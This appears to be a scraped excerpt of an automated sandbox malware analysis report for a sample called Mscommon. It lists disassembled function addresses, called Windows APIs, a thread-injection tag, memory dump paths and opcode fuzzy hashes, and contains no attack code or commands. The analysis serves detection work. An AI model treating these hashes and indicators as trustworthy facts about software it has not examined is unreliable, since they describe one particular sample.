Snapshot File: hcaresult_8_2_7ffd9bc80000_Mscommon.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 94c8c066af3295f2db81759df3e48e149b062c32c0f64438777c02e8baccbbc0
Instruction ID: e31391095d581884f49ce5e85ab2a36a328a90c0e7f65bca1d30b8a1312f77cc
Opcode Fuzzy Hash: 94c8c066af3295f2db81759df3e48e149b062c32c0f64438777c02e8baccbbc0
Instruction Fuzzy Hash: 2B516A70D0D78C8FDB99DFA8C894AEDBBF0EF56310F1441AAD049D7292DA389846CB11

Function 00007FFD9BC8D45D Relevance: 1.6, APIs: 1, Instructions: 141
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SuspendThread.KERNEL32 ref: 00007FFD9BC8D531

Memory Dump Source

Source File: 00000008.00000002.2037550413.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bc80000_Mscommon.jbxd

Similarity

API ID: SuspendThread
String ID:
API String ID: 3178671153-0
Opcode ID: 20fb3771c60442fc6c91e942a4518c8004172f9d863479fcd05d5ae635577d39
Instruction ID: 52e74ac1512152fad7bb32573740560a505ef9e39675b018c0a6e452a69e41cf
Opcode Fuzzy Hash: 20fb3771c60442fc6c91e942a4518c8004172f9d863479fcd05d5ae635577d39
Instruction Fuzzy Hash: 62410C70E0864C8FDB58DFA8D895AADBBF0EB5A311F10416AD049D7252DA74A845CB41

Function 00007FFD9BC90A25 Relevance: 1.6, APIs: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNEL32 ref: 00007FFD9BC90AF2

Memory Dump Source

Source File: 00000008.00000002.2037550413.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bc80000_Mscommon.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f371897d725672fc26ba4ad80343cfe66eb2ad8591ee8de315be78a6213738df
Instruction ID: 744b7a93244df3614f56c46ca79f89bbaef7e432fd47739c9744a4af6bef8bed
Opcode Fuzzy Hash: f371897d725672fc26ba4ad80343cfe66eb2ad8591ee8de315be78a6213738df
Instruction Fuzzy Hash: 0F41F870E08A5C8FDB98DFA8D895BEDBBF1FB59310F10416AD009E7252DA71A845CF41

Function 00007FFD9C1BA7F8 Relevance: 1.4, Strings: 1, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFD9C1BA872

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 6e57fbf5d1568e22fda11cc22fd1c02682233e94f3c0ca437f9d71e54440b111
Instruction ID: 98922c41c1ecadce090b157ed6de02d28e37f495bd8d6518e37b8ba16af5c0be
Opcode Fuzzy Hash: 6e57fbf5d1568e22fda11cc22fd1c02682233e94f3c0ca437f9d71e54440b111
Instruction Fuzzy Hash: E3517272E0854A9FDB69CB98C4615FDBBB1FF48340F1041BAD019E7286DA356A06CF44

Function 00007FFD9C1BFF98 Relevance: 1.4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFD9C1C0012

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 209f604421599b58b9472fdb34c543dcf9e7382085640edfd06fd888915e6294
Instruction ID: 728fcc352e53dd3eeda62b0c2e6ec626c474658ec7699311b8395beba0d94e54
Opcode Fuzzy Hash: 209f604421599b58b9472fdb34c543dcf9e7382085640edfd06fd888915e6294
Instruction Fuzzy Hash: 89514A32E0864E8FDB69DB98C8655BDBBB1FF49340F1041BED01AE7296CA386901CB54

Function 00007FFD9BC8ED69 Relevance: 1.4, APIs: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32 ref: 00007FFD9BC8EE41

Memory Dump Source

Source File: 00000008.00000002.2037550413.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bc80000_Mscommon.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: adca7f776c727148facf439f2e1e37cede8b5aa37c32c8c29543b8004a251d1f
Instruction ID: f16a42e1ada775cf11f1e592ea92f40bd22aa6f7ffb7621234c73670a2577b16
Opcode Fuzzy Hash: adca7f776c727148facf439f2e1e37cede8b5aa37c32c8c29543b8004a251d1f
Instruction Fuzzy Hash: EB417F70D0865D8FDB59DFA8D894BEDBBF0FF5A310F1041AAD049D7292DA34A885CB41

Function 00007FFD9C1B6CB0 Relevance: .7, Instructions: 683
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d73ef9ac4af26b01e57e2dbebd4e0ba87a41649fe65f5a1d4b3270638577a69
Instruction ID: 7259a9d248622390430a316eae59fc469736e28e16cef0b557d8a84f799cec5a
Opcode Fuzzy Hash: 6d73ef9ac4af26b01e57e2dbebd4e0ba87a41649fe65f5a1d4b3270638577a69
Instruction Fuzzy Hash: 0E229531B18A1A8FDBA8DB58C8A5A6873F2FF59310B1041B9D00ED7296DE24EC41CF95

Function 00007FFD9C1C020F Relevance: .4, Instructions: 423
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e25d651013d9908eb5c6e61a68a729929bd1536ff0dfdeea7c1867016c10f426
Instruction ID: fbf1a86d802b122f20a9fa82e9dd9bd769b1605c1ecda7b0a0c5b6058e5f49dd
Opcode Fuzzy Hash: e25d651013d9908eb5c6e61a68a729929bd1536ff0dfdeea7c1867016c10f426
Instruction Fuzzy Hash: 6BF1C231A585568FEB58DF58C4E06B477B1FF45310F9041BDE85ACB69ACB38E882CB84

Function 00007FFD9C1BCBD2 Relevance: .4, Instructions: 379
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d23c3ed6e27cac77d33eb50a09bf183ec1fcba0998153159569f7af5c3555326
Instruction ID: 10e613c802f6edf4bb185c4d314507d9bba9984ea9ecdc4128f2bdef128d6daf
Opcode Fuzzy Hash: d23c3ed6e27cac77d33eb50a09bf183ec1fcba0998153159569f7af5c3555326
Instruction Fuzzy Hash: 99B10923E0D6A75FE721ABACD8F10E57FB0EF152A8B0801B7E099DA097DD156405C788

Function 00007FFD9C1BCF99 Relevance: .4, Instructions: 378
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9e3b35a0babd0ea0dbe656971e3b7cb5c4497218df3779662a289d16ee86112
Instruction ID: 1efba6aec26ff411ddfbcce6caba574a4071c70ad852a49c9e9ed4831262c6b7
Opcode Fuzzy Hash: d9e3b35a0babd0ea0dbe656971e3b7cb5c4497218df3779662a289d16ee86112
Instruction Fuzzy Hash: 0351F423A0D6578AF33D7BA8A8214F97770AF053A9F1801B7E44D9A0DFCD1C78018B99

Function 00007FFD9C1BAA6F Relevance: .4, Instructions: 371
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6531d8325ac78d89c5c509c284634b70bcf7d411c57716f107fdb98ad4a16e13
Instruction ID: f355fad182f63c577dbd10f723acffda166706800a58423c1fe8b4f52c37aa9a
Opcode Fuzzy Hash: 6531d8325ac78d89c5c509c284634b70bcf7d411c57716f107fdb98ad4a16e13
Instruction Fuzzy Hash: 63D1C0316186528FEB69CF58C4E05B03BB1FF49311B5445BDD84A8B68FDA38F982CB85

Function 00007FFD9C1BAA8F Relevance: .3, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35981a1c911518d1f1da9f6d3b2cb67d94c9a8bc31c487da85a09a4d7b0a13cf
Instruction ID: 1c73c48a52a494b25b1a4df2581ffc1696856f920e27ee474ab95191356e69b7
Opcode Fuzzy Hash: 35981a1c911518d1f1da9f6d3b2cb67d94c9a8bc31c487da85a09a4d7b0a13cf
Instruction Fuzzy Hash: 3FC1D0316186428BEB2DCF58C4E05B13BB1FF49341B5445BDD88A8B68FDA38F981CB49

Function 00007FFD9C1C022F Relevance: .3, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5c85fbf99c39398a6a4dbe736711dc21e01f1c4640148b6c237b748f78e8779
Instruction ID: 791c76853789790a7124012489f1e4c42b2874e2e87ef21f442f7c06b4793496
Opcode Fuzzy Hash: b5c85fbf99c39398a6a4dbe736711dc21e01f1c4640148b6c237b748f78e8779
Instruction Fuzzy Hash: 3BC1DD31A585168FEB29DF44C4E05B537B1FF45350B9046BDE85B8B69BCB38E882CB84

Function 00007FFD9C1BA322 Relevance: .3, Instructions: 330
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7e00a4c0441b2faa8aba9a5fed047b23618f2886f711af117fbf764ea58e29f
Instruction ID: de14a0c1796c0ef6157323dbf0070a462578fbb27a1a8e38548ca105d32175e2
Opcode Fuzzy Hash: e7e00a4c0441b2faa8aba9a5fed047b23618f2886f711af117fbf764ea58e29f
Instruction Fuzzy Hash: 26C1C171B0CA479FE759DF68C4A06A4BBB1FF49340F5441B9D04EC7A8ACB28B951CB84

Function 00007FFD9C1B7AD7 Relevance: .3, Instructions: 328
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59ea9d38fdf945a9f9675dfdc6a947ac9c15c6eb0e0fdc1d940cd663dfcef45e
Instruction ID: f990393ab026e591f65ec5e366d653c7345b01e5e99395b5b2b6ec020222417e
Opcode Fuzzy Hash: 59ea9d38fdf945a9f9675dfdc6a947ac9c15c6eb0e0fdc1d940cd663dfcef45e
Instruction Fuzzy Hash: 9731C332B0C54B8FE778AB9894715F877F0EF14395F5404BAE00ED61CACD2968408B99

Function 00007FFD9C1B84A8 Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec5108e79fc146705c72f7c272be0d115054b0c4b7ab815ab85e0bb5b8bf341f
Instruction ID: a3d9c7cc072dfe705170123efdcf5e646d70ae3fc9d18f79b6fa8df0868feaca
Opcode Fuzzy Hash: ec5108e79fc146705c72f7c272be0d115054b0c4b7ab815ab85e0bb5b8bf341f
Instruction Fuzzy Hash: 78A1C732B0DA8A4FEBA5DB68C4746B87BF1FF85740F4900BBD04DD7296CE28A8058705

Function 00007FFD9C1BFB1A Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdea13ce046dd66815023e6ebf039318660350100f39e578879f5610af89e5e9
Instruction ID: 73a4454bd3fabf7b4fd30497cdd2bb04b16b356026381b024a5c53f30f5e8cfb
Opcode Fuzzy Hash: bdea13ce046dd66815023e6ebf039318660350100f39e578879f5610af89e5e9
Instruction Fuzzy Hash: 38B10735A0CA475FE759DF68C0A06A0B7B1FF05340F5441B9D44EC7A8BDB28B851CB84

Function 00007FFD9C1BD4DA Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 818ef56f34e034c5b3e91aa2a3a56fe33747458184aee66c0c17c8ca0fe91edc
Instruction ID: 0e0287a2254a9df7ca9fe2550b6682d9f03b9a947fd6e9c5d3b3a7048c6c1807
Opcode Fuzzy Hash: 818ef56f34e034c5b3e91aa2a3a56fe33747458184aee66c0c17c8ca0fe91edc
Instruction Fuzzy Hash: FA11E043F0E1C38AF23DB2B408301B899A12F517A4F1802BAD49EAA5CEDC0C3C411A8A

Function 00007FFD9C1BEFF6 Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15354815ccdf2d57f32630f6428ded73791c40e50a28fb8da40772e8d5ae07c3
Instruction ID: d5f428d1e1b59aea6b7b646b41b6645655cca79523008050eaa52497e7b05382
Opcode Fuzzy Hash: 15354815ccdf2d57f32630f6428ded73791c40e50a28fb8da40772e8d5ae07c3
Instruction Fuzzy Hash: 5F815836F0CA434FE7389A68946117577F1EF86394F1405BED48ED329BDE28B8028B45

Function 00007FFD9C1B9866 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94ed2b138162e4b5a32a92cf7aa1c4e236bcc9bdb5ee0726e2579fbc7007d911
Instruction ID: 5f945bbe0f9349ea4eec7a99c348714a35fc729db6ae831afbd96af35b6b64e5
Opcode Fuzzy Hash: 94ed2b138162e4b5a32a92cf7aa1c4e236bcc9bdb5ee0726e2579fbc7007d911
Instruction Fuzzy Hash: 53814632B0CA474BE7786AA8946117977F0EF49390F14057ED48ED728BDE2CB8038B49

Function 00007FFD9C1B7789 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db3372bf15e853b1482001a1f689306efc89651738fdce85f5124c9f80806d8c
Instruction ID: e5c0e4bdb61768448882db09bb99dea0feb095cfe9f099a8adb90f3040ecdbda
Opcode Fuzzy Hash: db3372bf15e853b1482001a1f689306efc89651738fdce85f5124c9f80806d8c
Instruction Fuzzy Hash: 2C715B73B0C54B4FE778DA5888764B437E0FF48350B1402B9D09ED75AADE18A826CBE5

Function 00007FFD9C1BCCFC Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b36a25e527afa07a972841fcb2feea268554febaba620e11151a1842ada1d289
Instruction ID: ebed57fc512ac92d1129a4d2ec1708f1f6227af82aefd58dbd021a247da1c30b
Opcode Fuzzy Hash: b36a25e527afa07a972841fcb2feea268554febaba620e11151a1842ada1d289
Instruction Fuzzy Hash: D0710823E0D6A75FD762EBACD8B00E97FB0EF15394B1801B7E089EA197D9186805C784

Function 00007FFD9C1BD4A7 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e12cfa49895ba5dadacd1b1b2ef9deb4067e0a715ede98a7aa858cc23afd2cfa
Instruction ID: 8b7a1d089fdefa39b2669c034501f267bb5b1214dbe48ec7a204daf254e66f4d
Opcode Fuzzy Hash: e12cfa49895ba5dadacd1b1b2ef9deb4067e0a715ede98a7aa858cc23afd2cfa
Instruction Fuzzy Hash: E311E213F0D1A78AF23CB6E928355F85A605F553B9F1802B7E44EAA0CFDC0C38415ADA

Function 00007FFD9C1BBAB1 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce88bae8e744064c5f54c71b2202a3989b39c31fa0b7135fb8d92425c0e77079
Instruction ID: b340a5f725231a6c996b4a3a099ba06e1d8b44705b8ca48fabc938fa1705dc09
Opcode Fuzzy Hash: ce88bae8e744064c5f54c71b2202a3989b39c31fa0b7135fb8d92425c0e77079
Instruction Fuzzy Hash: 3781BE31A08B078FE379DB54C5A567177B1FF44344B2449BDC48A87ADACA29B882CF84

Function 00007FFD9C1BAE00 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2d46da38a82f04dc397df040fffac5e3c9e6b23de4bdaae6f59a9c8df510408
Instruction ID: 1be0c262c28877b76f9ce918bceb0e7de6ec08ab850afe2a20a1894d10f74371
Opcode Fuzzy Hash: d2d46da38a82f04dc397df040fffac5e3c9e6b23de4bdaae6f59a9c8df510408
Instruction Fuzzy Hash: F581B171E0864A4FEBA8DB6488657E87BB0EF59310F0441FEE05DD6296DE346A808B05

Function 00007FFD9C1B6A9B Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f826a1d00a06f93ce0e5066e6951f82ef050799a90a2a0afa0beb86f5bf48f6
Instruction ID: 39a1722d3a20134d1df238fce229d271b658bec8246c898d58468dc4c65bc110
Opcode Fuzzy Hash: 5f826a1d00a06f93ce0e5066e6951f82ef050799a90a2a0afa0beb86f5bf48f6
Instruction Fuzzy Hash: BC51A432F1C54B8EEB79DBA488645BD7BB0FF69340F5405BAD00EE7189DE28A9418B05

Function 00007FFD9C1BDD1B Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0d4a30875c62972d63a4b2dc9754b70464b9e703606b4598f7e6afe4e1279cc
Instruction ID: f46dc0803a5e0a71706e7e6160d5d8f34fc52f12347b90aa4b23319f1f269317
Opcode Fuzzy Hash: b0d4a30875c62972d63a4b2dc9754b70464b9e703606b4598f7e6afe4e1279cc
Instruction Fuzzy Hash: 6B518632E1D54B8FF7A9EBA488646BC7BB0EF55344F1405BAE00EE71DDDE2468418B05

Function 00007FFD9BAD08D0 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72b8e8cdec6b03205b519de9666768c2413fe85d480b872ce2ae663cc23f39fa
Instruction ID: f1155722399b8391f9fecba4a23addba578803b79f3c7b7e3bc8f842af5558f7
Opcode Fuzzy Hash: 72b8e8cdec6b03205b519de9666768c2413fe85d480b872ce2ae663cc23f39fa
Instruction Fuzzy Hash: C751B331A0855D8FDB54EFA8D8A5AFD7BA0FF58329F0402BBD409DB1A6CE246441C784

Function 00007FFD9C1BCD85 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5cac9b97636a961b52163744e8ae2a8ede3b77c26f39cf2a9096d911c6e46a5
Instruction ID: b351013510a7a58b8c0eff9aaa1cbfa6a18aae0a4125d22683c92b1326e28ccb
Opcode Fuzzy Hash: f5cac9b97636a961b52163744e8ae2a8ede3b77c26f39cf2a9096d911c6e46a5
Instruction Fuzzy Hash: 29510932E0D69A8FD765EBACD8B14E97FB0EF15358B1401BBE049EB197DA245804CB84

Function 00007FFD9BAD0908 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2284b01544bf7bc603de43c2e0efd4be9c67981868698d5ad8da2ec853307333
Instruction ID: cff7a6b75b8f3d811382f04a372af8bf58e685cfba1e53b4aa3b2bd7bef8dbb0
Opcode Fuzzy Hash: 2284b01544bf7bc603de43c2e0efd4be9c67981868698d5ad8da2ec853307333
Instruction Fuzzy Hash: 7A519C30A0490E9FCF84EF98D488EEDBBF1FF58314B050169E419E7260DA70E990CB80

Function 00007FFD9C1B740C Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6d79246cfe352c46c31fb62d5bad7f9872628be6c7f156dad63201614c0c60f
Instruction ID: 892213eb8b0ceda1711eca41246f470be363125f383bd99ff76c1cf87f2968c7
Opcode Fuzzy Hash: c6d79246cfe352c46c31fb62d5bad7f9872628be6c7f156dad63201614c0c60f
Instruction Fuzzy Hash: 8C41363194E7CA8FE3139364D8256F57FA0EF83365F0801FAE0898A0A3D6995516CB92

Function 00007FFD9C1B00D7 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd129c262b85f4fdac8d80c991c73307a3c67a8890dd505495cd2b30c5294cd4
Instruction ID: c33581fb4668dfea4294f585d8586b4f1df978b86903cf43e1bc274bdff59cb9
Opcode Fuzzy Hash: fd129c262b85f4fdac8d80c991c73307a3c67a8890dd505495cd2b30c5294cd4
Instruction Fuzzy Hash: 2C41763270C9098FDF6CEB18C465DA573E1FBA9320B4406B9D04FD7296DE25E845CB85

Function 00007FFD9C1B81A0 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83262f574ba87e4602856147ccad8de140fcb307c287064ea6e9212468fb5915
Instruction ID: dc79bca3882b21b94d56e3eed965f604560368b4d3b67c4b1892c0c631eafd9d
Opcode Fuzzy Hash: 83262f574ba87e4602856147ccad8de140fcb307c287064ea6e9212468fb5915
Instruction Fuzzy Hash: 1041D463E0DD4B8FF764D69888715FC7BB0EF55784F5401BAE04EA618BDE186402CB48

Function 00007FFD9C1BC067 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21831187ad6b1689f81f9c6f4da705b1a96fe0819fa68dee2bcfd8a61d4d8c24
Instruction ID: 5c94772ed294394a052288b236895327487913c908ea64b0dec3ed0eb397da08
Opcode Fuzzy Hash: 21831187ad6b1689f81f9c6f4da705b1a96fe0819fa68dee2bcfd8a61d4d8c24
Instruction Fuzzy Hash: A941863270C9098FDF68EF58C4A9DA4B3E1FF78320B04416AD04ED7296CE21E895CB85

Function 00007FFD9BAD0998 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

